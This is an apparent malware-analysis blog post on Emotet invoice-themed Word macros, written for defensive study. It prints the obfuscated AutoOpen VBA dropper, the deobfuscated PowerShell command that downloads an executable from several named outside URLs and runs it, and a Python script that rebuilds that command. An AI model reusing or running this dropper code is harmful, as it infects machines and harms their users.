2018-09-18 Emotet maldocs labeled as “Invoices”

Looking through the email filters on the 18th of September, I found a small batch of Emotet emails from the same sender. The emails tried to spoof the From address, but Outlook ended up displaying both addresses (the spoofed one and the true sender). Across the batch there were two distinct attachment hashes. Below are the MD5 hashes of the maldocs:

MD5 (Invoice_No_K57935.doc) = 91934748cd49981fe7921b1d46251cfc
MD5 (Invoice_No_R80313.doc) = cc177a87b917fa703b9c77873453817a
MD5 (Invoice_No_R80313[1].doc) = cc177a87b917fa703b9c77873453817a
MD5 (Invoice_No_R80313[2].doc) = cc177a87b917fa703b9c77873453817a
MD5 (Invoice_No_R80313[3].doc) = cc177a87b917fa703b9c77873453817a
MD5 (Invoice_No_R80313[4].doc) = cc177a87b917fa703b9c77873453817a
MD5 (Invoice_No_R80313[5].doc) = cc177a87b917fa703b9c77873453817a

The artifacts from this analysis can be found in my GitHub repository.

Another security researcher who has been actively maintaining Emotet data (http://twitter.com/ps66uk/status/1042004723866509313) had already documented the IPs/IOCs below in a Pastebin link found in that tweet.

The executables dropped by the maldoc all have the same hash; the file appears to be renamed as execution passes from parent to child. Initially the first file (zhniYMNIL.exe) was located in the C:\Users\Public folder and ran from there. Shortly thereafter it exited, having spawned another copy of itself, which in turn exited after spawning two more child processes. The new process was called "srvloada.exe" and ran from the "C:\Users\Bill\AppData\Local\Microsoft\Windows" path. This is also the process responsible for talking back to the C2, which can be seen in Wireshark.

IOCs
——-
23.229.168.200 / hxxp://abporter.org/zhniYMNIL
hxxp://bearinmindstrategies.com/of7Cpb8
hxxp://ondacapital.es/EwCyzzc
hxxp://landspa.ir/Nl9U64Eg0
hxxp://shoshana.ge/QwlUmzzVaF
69.70.248.98:8443 (TCP)
190.189.12.16:8080 (TCP)
96.242.246.128 (TCP)

Deobfuscating the script
————————-

Instead of the old tried-and-true method of running the maldoc through OfficeMalScanner, looking at the script files it outputs and then cleaning them up by hand, I decided to try another tool, oletools (http://www.decalage.info/python/oletools), and in particular olevba. Below are the steps I used to deobfuscate the script (or at least make it readable). One thing to note is that the current run of Emotet maldocs all share the same basic script layout, so once you have worked through one, the rest are fairly easy to decipher.

First, I pointed olevba at the maldoc with the --deobf switch, which attempts to deobfuscate the VBA code it finds. It does not resolve the Chr() arithmetic these scripts use for single characters (here Chr(99), Chr(67) and Chr(34), i.e. c, C and the double quote), so those stay as expressions in the macro listing. Once I did that I got the following output:

olevba Invoice_No_R80313.doc --deobf

olevba 0.53.1 - http://decalage.info/python/oletools
Flags        Filename                                                         
-----------  -----------------------------------------------------------------
OLE:MAS----V Invoice_No_R80313.doc
===============================================================================
FILE: Invoice_No_R80313.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO DBKDWFuIhNwzVw.cls 
in file: Invoice_No_R80313.doc - OLE stream: u'Macros/VBA/DBKDWFuIhNwzVw'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Sub AutoOpen()
Const vjKOKlU = 0
   Dim driCYS(2)
driCYS(0) = Right(JVFjZ, 862)
driCYS(1) = MidB(ZojZHrv, 809, 684)
   Dim MIbjca(3)
MIbjca(0) = Right(JVFjZ, 862)
MIbjca(1) = Mid(EOqjzdt, 323, 516)
MIbjca(2) = Right(JVFjZ, 862)
   Dim ILVJd(5)
ILVJd(0) = Right(JVFjZ, 862)
ILVJd(1) = MidB(ZojZHrv, 809, 684)
ILVJd(2) = Left(Xdurj, 100)
ILVJd(3) = Mid(EOqjzdt, 323, 516)
ILVJd(4) = Left(Xdurj, 100)
   Dim huziw(4)
huziw(0) = Left(Xdurj, 100)
huziw(1) = MidB(ZojZHrv, 809, 684)
huziw(2) = Left(Xdurj, 100)
huziw(3) = MidB(ZojZHrv, 809, 684)
   Dim Mnfjzi(5)
Mnfjzi(0) = Left(Xdurj, 100)
Mnfjzi(1) = Right(JVFjZ, 862)
Mnfjzi(2) = MidB(ZojZHrv, 809, 684)
Mnfjzi(3) = Right(JVFjZ, 862)
Mnfjzi(4) = Left(Xdurj, 100)
Shell@ SdYTp + aTlfHVjQIvf + zXOhiibnrP, CInt(vjKOKlU)
   Dim RLtFPZ(4)
RLtFPZ(0) = Left(Xdurj, 100)
RLtFPZ(1) = Left(Xdurj, 100)
RLtFPZ(2) = Right(JVFjZ, 862)
RLtFPZ(3) = MidB(ZojZHrv, 809, 684)
   Dim CAYIzk(4)
CAYIzk(0) = MidB(ZojZHrv, 809, 684)
CAYIzk(1) = Mid(EOqjzdt, 323, 516)
CAYIzk(2) = Left(Xdurj, 100)
CAYIzk(3) = Mid(EOqjzdt, 323, 516)
End Sub

-------------------------------------------------------------------------------
VBA MACRO HJXWrpqHU.bas 
in file: Invoice_No_R80313.doc - OLE stream: u'Macros/VBA/HJXWrpqHU'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Function SdYTp()
Dim FXnVM(3)
FXnVM(0) = Mid(EOqjzdt, 323, 516)
FXnVM(1) = MidB(ZojZHrv, 809, 684)
FXnVM(2) = Right(JVFjZ, 862)
   Dim kiDRl(3)
kiDRl(0) = Left(Xdurj, 100)
kiDRl(1) = Left(Xdurj, 100)
kiDRl(2) = Mid(EOqjzdt, 323, 516)
qoUEHwZz = Format(Chr(3 + 9 + 3 + 0 + 84)) + "md /V^:ON/" + Format(Chr(2 + 6 + 2 + 0 + 57)) + Format(Chr(1 + 3 + 1 + 0 + 29)) + "^se^t ^Ke=   ^" + "  ^     ^ ^  ^  ^ ^ }" + "^}{h" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^ta" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "};^kaer^b^;zkw$ ^" + "m^e^tI^-^e^kovn^I;" + ")zk^w^$ ,^Z^UV$(^eliFdao" + "^ln^woD^.a^z^l${" + "^yrt{)j^FV$" + "^ ni ZUV$(^h"
Dim GJIzU(3)
GJIzU(0) = Right(JVFjZ, 862)
GJIzU(1) = Left(Xdurj, 100)
GJIzU(2) = Right(JVFjZ, 862)
   Dim YYIwF(4)
YYIwF(0) = Right(JVFjZ, 862)
YYIwF(1) = Left(Xdurj, 100)
YYIwF(2) = Mid(EOqjzdt, 323, 516)
YYIwF(3) = MidB(ZojZHrv, 809, 684)
   Dim VPsSo(3)
VPsSo(0) = Left(Xdurj, 100)
VPsSo(1) = MidB(ZojZHrv, 809, 684)
VPsSo(2) = Right(JVFjZ, 862)
bYUpXlw = Format(Chr(3 + 9 + 3 + 0 + 84)) + "aerof;'^e^xe^.^'^+q^pv$+'\" + "^'^+" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^ilbu^p:vne$=" + "^z^kw$;^'^45^6^' =^ q^pv$;)'^@" + "'(^t^ilp^S^.^'^F^aV^z^zm^U^lw" + "Q/^eg.^ana^h^s^o^h^s//^:p" + "^t^t^h@0gE4^6U^9^lN/ri^." + "^ap^sdn^al//^:ptt^h@" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "z^zy" + Format(Chr(2 + 6 + 2 + 0 + 57)) + "wE" + "/^s^e^.^la^t^i^pa" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^a^dno//^:" + "^ptth^@^8^b^p" + Format(Chr(2 + 6 + 2 + 0 + 57)) + "^7f^o/mo" + Format(Chr(3 + 9 + 3 + 0 + 84)) + ".se" + "^ige^tarts^dni^mnir"
Dim TmMLp(5)
TmMLp(0) = Mid(EOqjzdt, 323, 516)
TmMLp(1) = Left(Xdurj, 100)
TmMLp(2) = Left(Xdurj, 100)
TmMLp(3) = MidB(ZojZHrv, 809, 684)
TmMLp(4) = Left(Xdurj, 100)
   Dim FrnWaj(3)
FrnWaj(0) = Left(Xdurj, 100)
FrnWaj(1) = Left(Xdurj, 100)
FrnWaj(2) = Right(JVFjZ, 862)
WzHqWJWbBXQ = "a^e^b//^:^pt^th^@^LIN^" + "M^Y^in^hz/" + "gr^o.re^t" + "r^o^pb^a//:^pt^th'" + "=^jFV^$^;^tn^eil" + Format(Chr(2 + 6 + 2 + 0 + 57)) + "b^eW.^teN" + " t" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^e^jb^o-^w^e" + "n^=azl^$ ^lleh^srewop&&^f" + "or /^L %^D ^in (3^6^7;^-1" + "^;^0)^d^o s^e^t ^" + "if=!^if!!^Ke" + ":~%^D,1!&&i^f" + " %^D ^l^ss ^1 " + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^" + "a^l^l %^if:^*^if^!="
Dim LWJFWj(4)
LWJFWj(0) = Left(Xdurj, 100)
LWJFWj(1) = Right(JVFjZ, 862)
LWJFWj(2) = MidB(ZojZHrv, 809, 684)
LWJFWj(3) = Mid(EOqjzdt, 323, 516)
   Dim bwuVfz(2)
bwuVfz(0) = Right(JVFjZ, 862)
bwuVfz(1) = Right(JVFjZ, 862)
   Dim zbYtJ(4)
zbYtJ(0) = Left(Xdurj, 100)
zbYtJ(1) = MidB(ZojZHrv, 809, 684)
zbYtJ(2) = Right(JVFjZ, 862)
zbYtJ(3) = Mid(EOqjzdt, 323, 516)
   Dim vsQWWO(3)
vsQWWO(0) = Right(JVFjZ, 862)
vsQWWO(1) = Right(JVFjZ, 862)
vsQWWO(2) = Left(Xdurj, 100)
   Dim wXKAfS(4)
wXKAfS(0) = Mid(EOqjzdt, 323, 516)
wXKAfS(1) = Right(JVFjZ, 862)
wXKAfS(2) = Right(JVFjZ, 862)
wXKAfS(3) = Mid(EOqjzdt, 323, 516)
CwjjZpQsN = "%" + Format(Chr(1 + 3 + 1 + 0 + 29)) + ""
SdYTp = qoUEHwZz + bYUpXlw + WzHqWJWbBXQ + CwjjZpQsN
   Dim VILOp(2)
VILOp(0) = Right(JVFjZ, 862)
VILOp(1) = Right(JVFjZ, 862)
End Function

+------------+----------------------+-----------------------------------------+
| Type       | Keyword              | Description                             |
+------------+----------------------+-----------------------------------------+
| AutoExec   | AutoOpen             | Runs when the Word document is opened   |
| Suspicious | Chr                  | May attempt to obfuscate specific       |
|            |                      | strings (use option --deobf to          |
|            |                      | deobfuscate)                            |
| Suspicious | Shell                | May run an executable file or a system  |
|            |                      | command                                 |
| Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
|            | Strings              | may be used to obfuscate strings        |
|            |                      | (option --decode to see all)            |
| VBA string | cmd /V^:ON/          | (Chr(3 + 9 + 3 + 0 + 84)) + "md         |
|            |                      | /V^:ON/"                                |
| VBA string | C                    | (Chr(2 + 6 + 2 + 0 + 57))               |
| VBA string | "^se^t ^Ke=   ^  ^   | (Chr(1 + 3 + 1 + 0 + 29)) + "^se^t ^Ke= |
|            | ^ ^  ^  ^ ^ }^}{h    | ^" + "  ^     ^ ^  ^  ^ ^ }" + "^}{h"   |
| VBA string | c^ta                 | (Chr(3 + 9 + 3 + 0 + 84)) + "^ta"       |
| VBA string | c};^kaer^b^;zkw$ ^m^ | (Chr(3 + 9 + 3 + 0 + 84)) +             |
|            | e^tI^-^e^kovn^I;)zk^ | "};^kaer^b^;zkw$ ^" +                   |
|            | w^$ ,^Z^UV$(^eliFdao | "m^e^tI^-^e^kovn^I;" + ")zk^w^$         |
|            | ^ln^woD^.a^z^l${^yrt | ,^Z^UV$(^eliFdao" + "^ln^woD^.a^z^l${"  |
|            | {)j^FV$^ ni ZUV$(^h  | + "^yrt{)j^FV$" + "^ ni ZUV$(^h"        |
| VBA string | caerof;'^e^xe^.^'^+q | (Chr(3 + 9 + 3 + 0 + 84)) +             |
|            | ^pv$+'\^'^+          | "aerof;'^e^xe^.^'^+q^pv$+'\" + "^'^+"   |
| VBA string | c^ilbu^p:vne$=^z^kw$ | (Chr(3 + 9 + 3 + 0 + 84)) +             |
|            | ;^'^45^6^' =^ q^pv$; | "^ilbu^p:vne$=" + "^z^kw$;^'^45^6^' =^  |
|            | )'^@'(^t^ilp^S^.^'^F | q^pv$;)'^@" +                           |
|            | ^aV^z^zm^U^lwQ/^eg.^ | "'(^t^ilp^S^.^'^F^aV^z^zm^U^lw" +       |
|            | ana^h^s^o^h^s//^:p^t | "Q/^eg.^ana^h^s^o^h^s//^:p" +           |
|            | ^t^h@0gE4^6U^9^lN/ri | "^t^t^h@0gE4^6U^9^lN/ri^." +            |
|            | ^.^ap^sdn^al//^:ptt^ | "^ap^sdn^al//^:ptt^h@"                  |
|            | h@                   |                                         |
| VBA string | cz^zy                | (Chr(3 + 9 + 3 + 0 + 84)) + "z^zy"      |
| VBA string | CwE/^s^e^.^la^t^i^pa | (Chr(2 + 6 + 2 + 0 + 57)) + "wE" +      |
|            |                      | "/^s^e^.^la^t^i^pa"                     |
| VBA string | c^a^dno//^:^ptth^@^8 | (Chr(3 + 9 + 3 + 0 + 84)) +             |
|            | ^b^p                 | "^a^dno//^:" + "^ptth^@^8^b^p"          |
| VBA string | C^7f^o/mo            | (Chr(2 + 6 + 2 + 0 + 57)) + "^7f^o/mo"  |
| VBA string | c.se^ige^tarts^dni^m | (Chr(3 + 9 + 3 + 0 + 84)) + ".se" +     |
|            | nir                  | "^ige^tarts^dni^mnir"                   |
| VBA string | a^e^b//^:^pt^th^@^LI | "a^e^b//^:^pt^th^@^LIN^" + "M^Y^in^hz/" |
|            | N^M^Y^in^hz/gr^o.re^ | + "gr^o.re^t" + "r^o^pb^a//:^pt^th'" +  |
|            | tr^o^pb^a//:^pt^th'= | "=^jFV^$^;^tn^eil"                      |
|            | ^jFV^$^;^tn^eil      |                                         |
| VBA string | Cb^eW.^teN t         | (Chr(2 + 6 + 2 + 0 + 57)) + "b^eW.^teN" |
|            |                      | + " t"                                  |
| VBA string | c^e^jb^o-^w^en^=azl^ | (Chr(3 + 9 + 3 + 0 + 84)) +             |
|            | $ ^lleh^srewop&&^for | "^e^jb^o-^w^e" + "n^=azl^$              |
|            | /^L %^D ^in          | ^lleh^srewop&&^f" + "or /^L %^D ^in     |
|            | (3^6^7;^-1^;^0)^d^o  | (3^6^7;^-1" + "^;^0)^d^o s^e^t ^" +     |
|            | s^e^t ^if=!^if!!^Ke: | "if=!^if!!^Ke" + ":~%^D,1!&&i^f" + "    |
|            | ~%^D,1!&&i^f %^D     | %^D ^l^ss ^1 "                          |
|            | ^l^ss ^1             |                                         |
| VBA string | c^a^l^l              | (Chr(3 + 9 + 3 + 0 + 84)) + "^" +       |
|            | %^if:^*^if^!=        | "a^l^l %^if:^*^if^!="                   |
| VBA string | "                    | (Chr(1 + 3 + 1 + 0 + 29)) + ""          |
+------------+----------------------+-----------------------------------------+

The top half of the output is the macro code that olevba extracted from the maldoc, which is the same thing OfficeMalScanner would give you. As you can see, most of it is junk. The easy tell is to look at where each variable is used: the Dim'd arrays are filled with slices of other strings and then never read anywhere, and a variable that is only ever assigned to and never read is almost certainly padding. Continuing down through the script, you get to the second macro (HJXWrpqHU.bas), where the real string building starts and the obfuscation switches to DOSfuscation (http://www.blackhat.com/docs/asia-18/asia-18-bohannon-invoke_dosfuscation_techniques_for_fin_style_dos_level_cmd_obfuscation.pdf), carets sprinkled through a cmd.exe command line, as seen here:

bYUpXlw = Format(Chr(3 + 9 + 3 + 0 + 84)) + "aerof;'^e^xe^.^'^+q^pv$+'\" + "^'^+" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^ilbu^p:vne$=" + "^z^kw$;^'^45^6^' =^ q^pv$;)'^@" + "'(^t^ilp^S^.^'^F^aV^z^zm^U^lw" + "Q/^eg.^ana^h^s^o^h^s//^:p" + "^t^t^h@0gE4^6U^9^lN/ri^." + "^ap^sdn^al//^:ptt^h@" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "z^zy" + Format(Chr(2 + 6 + 2 + 0 + 57)) + "wE" + "/^s^e^.^la^t^i^pa" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^a^dno//^:" + "^ptth^@^8^b^p" + Format(Chr(2 + 6 + 2 + 0 + 57)) + "^7f^o/mo" + Format(Chr(3 + 9 + 3 + 0 + 84)) + ".se" + "^ige^tarts^dni^mnir"

If you keep scrolling through the output, you get to the section where olevba tries to clean up the strings and flags anything that looks suspicious. The Keyword column is the useful part: olevba has already evaluated the Chr() expressions there (Chr(99), Chr(67) and Chr(34) become c, C and the double quote), so the fragments are in plain text. I copied all the text from that section, pasted it into the Sublime text editor and removed the TYPE and DESCRIPTION columns, so you should end up with something that looks like this:

cmd /V^:ON/         
                    
C                   
"^se^t ^Ke=   ^  ^  
^ ^  ^  ^ ^ }^}{h   
c^ta                
c};^kaer^b^;zkw$ ^m^
e^tI^-^e^kovn^I;)zk^
w^$ ,^Z^UV$(^eliFdao
^ln^woD^.a^z^l${^yrt
{)j^FV$^ ni ZUV$(^h 
caerof;'^e^xe^.^'^+q
^pv$+'\^'^+         
c^ilbu^p:vne$=^z^kw$
;^'^45^6^' =^ q^pv$;
)'^@'(^t^ilp^S^.^'^F
^aV^z^zm^U^lwQ/^eg.^
ana^h^s^o^h^s//^:p^t
^t^h@0gE4^6U^9^lN/ri
^.^ap^sdn^al//^:ptt^
h@                  
cz^zy               
CwE/^s^e^.^la^t^i^pa
                    
c^a^dno//^:^ptth^@^8
^b^p                
C^7f^o/mo           
c.se^ige^tarts^dni^m
nir                 
a^e^b//^:^pt^th^@^LI
N^M^Y^in^hz/gr^o.re^
tr^o^pb^a//:^pt^th'=
^jFV^$^;^tn^eil     
Cb^eW.^teN t        
                    
c^e^jb^o-^w^en^=azl^
$ ^lleh^srewop&&^for
/^L %^D ^in         
(3^6^7;^-1^;^0)^d^o 
s^e^t ^if=!^if!!^Ke:
~%^D,1!&&i^f %^D    
^l^ss ^1            
c^a^l^l             
%^if:^*^if^!=       
" 

From here, using Sublime, replace all of the '^' characters, spaces and newlines with nothing. Stripping the spaces goes further than cmd.exe itself would (cmd only drops each caret and takes the character after it literally), so the result is for reading rather than for re-running, but it is enough to pull the URLs out. You should get something like this, all on one line:

cmd/V:ON/C"setKe=}}{hctac};kaerb;zkw$metI-ekovnI;)zkw$,ZUV$(eliFdaolnwoD.azl${yrt{)jFV$niZUV$(hcaerof;'exe.'+qpv$+'\'+cilbup:vne$=zkw$;'456'=qpv$;)'@'(tilpS.'FaVzzmUlwQ/eg.anahsohs//:ptth@0gE46U9lN/ri.apsdnal//:ptth@czzyCwE/se.latipacadno//:ptth@8bpC7fo/moc.seigetartsdnimniraeb//:ptth@LINMYinhz/gro.retropba//:ptth'=jFV$;tneilCbeW.teNtcejbo-wen=azl$llehsrewop&&for/L%Din(367;-1;0)dosetif=!if!!Ke:~%D,1!&&if%Dlss1call%if:*if!="

From this point you should be able to see the pattern. The first part is plain cmd, but the value assigned to Ke is the PowerShell command written backwards: the for /L loop counting down from 367 to 0 appends one character of Ke at a time (!Ke:~%D,1!) to rebuild it front to back, and the final call %if:*if!=% runs the result. For example:

**BEFORE**
------------------
{hctac};kaerb;zkw$metI-ekovnI;)zkw$,ZUV$(eliFdaolnwoD.azl${yrt{)jFV$niZUV$(hcaerof;'exe.'+qpv$+'\'+cilbup:vne$=zkw$;'456'=qpv$;)'@'(tilpS.'FaVzzmUlwQ/eg.anahsohs//:ptth@0gE46U9lN/ri.apsdnal//:ptth@czzyCwE/se.latipacadno//:ptth@8bpC7fo/moc.seigetartsdnimniraeb//:ptth@LINMYinhz/gro.retropba//:ptth'=jFV$;tneilCbeW.teNtcejbo-wen=azl$llehsrewop&&for/L%Din(367;-1;0)dosetif=!if!!Ke:~%D,1!&&if%Dlss1call%if:*if!="

**AFTER**
---------------
"=!fi*:fi%llac1sslD%fi&&!1,D%~:eK!!fi!=fitesod)0;1-;763(niD%L/rof&&powershell$lza=new-objectNet.WebClient;$VFj='http://abporter.org/zhniYMNIL@http://bearinmindstrategies.com/of7Cpb8@http://ondacapital.es/EwCyzzc@http://landspa.ir/Nl9U64Eg0@http://shoshana.ge/QwlUmzzVaF'.Split('@');$vpq='654';$wkz=$env:public+'\'+$vpq+'.exe';foreach($VUZin$VFj){try{$lza.DownloadFile($VUZ,$wkz);Invoke-Item$wkz;break;}catch{

The easiest way to reverse it: I saved the BEFORE text to a file and ran the following command to flip it (rev reverses each line, which is why the text needs to be on a single line):

cat <PATH TO THE FILE NAME> | rev
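The whole chain above can be replayed in code: evaluate the Chr() arithmetic and the string concatenation that build the Shell() argument, apply cmd.exe's caret rule (a caret is dropped and the character after it is taken literally, which is all the cleanup that strictly needs doing), and then run the set / for /L / call sequence the way cmd /V:ON would, so the reversal falls out of the loop instead of out of rev. This is an added example, not code from the original post: the five VBA statements are copied verbatim from the olevba output of HJXWrpqHU.bas above, and the evaluator and emulator are mine and only handle the constructs this script uses. The emulation also shows why the script ends with call %if:*if!=% rather than a plain call %if%.

```python
"""Replay the maldoc's string building, cmd.exe escaping and FOR-loop reversal.

Added example, not code from the original post. The five VBA statements in
VBA_SOURCE are copied from the olevba output of HJXWrpqHU.bas; the evaluator
and the cmd emulation are mine and only cover what this script uses.
"""
import re

VBA_SOURCE = r'''
qoUEHwZz = Format(Chr(3 + 9 + 3 + 0 + 84)) + "md /V^:ON/" + Format(Chr(2 + 6 + 2 + 0 + 57)) + Format(Chr(1 + 3 + 1 + 0 + 29)) + "^se^t ^Ke=   ^" + "  ^     ^ ^  ^  ^ ^ }" + "^}{h" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^ta" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "};^kaer^b^;zkw$ ^" + "m^e^tI^-^e^kovn^I;" + ")zk^w^$ ,^Z^UV$(^eliFdao" + "^ln^woD^.a^z^l${" + "^yrt{)j^FV$" + "^ ni ZUV$(^h"
bYUpXlw = Format(Chr(3 + 9 + 3 + 0 + 84)) + "aerof;'^e^xe^.^'^+q^pv$+'\" + "^'^+" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^ilbu^p:vne$=" + "^z^kw$;^'^45^6^' =^ q^pv$;)'^@" + "'(^t^ilp^S^.^'^F^aV^z^zm^U^lw" + "Q/^eg.^ana^h^s^o^h^s//^:p" + "^t^t^h@0gE4^6U^9^lN/ri^." + "^ap^sdn^al//^:ptt^h@" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "z^zy" + Format(Chr(2 + 6 + 2 + 0 + 57)) + "wE" + "/^s^e^.^la^t^i^pa" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^a^dno//^:" + "^ptth^@^8^b^p" + Format(Chr(2 + 6 + 2 + 0 + 57)) + "^7f^o/mo" + Format(Chr(3 + 9 + 3 + 0 + 84)) + ".se" + "^ige^tarts^dni^mnir"
WzHqWJWbBXQ = "a^e^b//^:^pt^th^@^LIN^" + "M^Y^in^hz/" + "gr^o.re^t" + "r^o^pb^a//:^pt^th'" + "=^jFV^$^;^tn^eil" + Format(Chr(2 + 6 + 2 + 0 + 57)) + "b^eW.^teN" + " t" + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^e^jb^o-^w^e" + "n^=azl^$ ^lleh^srewop&&^f" + "or /^L %^D ^in (3^6^7;^-1" + "^;^0)^d^o s^e^t ^" + "if=!^if!!^Ke" + ":~%^D,1!&&i^f" + " %^D ^l^ss ^1 " + Format(Chr(3 + 9 + 3 + 0 + 84)) + "^" + "a^l^l %^if:^*^if^!="
CwjjZpQsN = "%" + Format(Chr(1 + 3 + 1 + 0 + 29)) + ""
SdYTp = qoUEHwZz + bYUpXlw + WzHqWJWbBXQ + CwjjZpQsN
'''

# The three token kinds these expressions use: Format(Chr(a + b + ...)),
# a double-quoted literal ("" inside it is an escaped quote), or a variable.
TOKEN = re.compile(r'Format\(Chr\(([^)]*)\)\)|"((?:[^"]|"")*)"|([A-Za-z_]\w*)')


def eval_vba_strings(source):
    """Evaluate the 'name = expr' lines in order and return {name: value}."""
    env = {}
    for line in source.strip().splitlines():
        name, expr = re.match(r'(\w+) = (.*)', line).groups()
        parts = []
        for chr_args, literal, ident in TOKEN.findall(expr):
            if chr_args:          # Chr(3 + 9 + 3 + 0 + 84) -> chr(99) -> 'c'
                parts.append(chr(sum(int(n) for n in re.findall(r'\d+', chr_args))))
            elif ident:           # variable assigned on an earlier line
                parts.append(env[ident])
            else:                 # string literal (possibly empty)
                parts.append(literal.replace('""', '"'))
        env[name] = ''.join(parts)
    return env


def cmd_unescape(text):
    """cmd.exe's escape rule: the caret is dropped, the next character is literal."""
    return re.sub(r'\^(.)', r'\1', text, flags=re.S)


def emulate_cmd(command_line):
    """Run the set / for /L / call chain as cmd /V:ON does and return the
    command line that reaches CALL."""
    inner = re.fullmatch(r'cmd /V:ON/C"(.*)"', command_line, re.S).group(1)
    _src_var, src = re.match(r'set (\w+)=(.*?)&&', inner, re.S).groups()
    start, step, end = map(int, re.search(
        r'for /L %\w in \((-?\d+);(-?\d+);(-?\d+)\)', inner).groups())
    acc_var, junk_prefix = re.search(r'call %(\w+):\*(.*?)=%', inner).groups()
    # On the command line an undefined !if! is left as the literal text "!if!",
    # so the first loop iteration seeds the accumulator with it. That is what
    # the final 'call %if:*if!=%' (drop everything through "if!") removes.
    acc = f'!{acc_var}!'
    for i in range(start, end + (1 if step > 0 else -1), step):
        if 0 <= i < len(src):     # !Ke:~%D,1! is the single character at index D
            acc += src[i]
    return acc.split(junk_prefix, 1)[1]


def recover_powershell():
    """What Shell() passes to cmd.exe, after the cmd layer has run."""
    shell_arg = eval_vba_strings(VBA_SOURCE)['SdYTp']
    return emulate_cmd(cmd_unescape(shell_arg))


def extract_urls(powershell):
    return re.findall(r"https?://[^\s'\"@]+", powershell)


if __name__ == '__main__':
    ps = recover_powershell()
    print(ps.strip())
    print(*extract_urls(ps), sep='\n')
```

Because the loop only walks indices 367 down to 0, the length of the Ke string has to match exactly: the run of spaces the script pads Ke with (which end up after the closing braces of the rebuilt command) is what makes it 368 characters long, and a one-off would chop the leading "p" off powershell.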
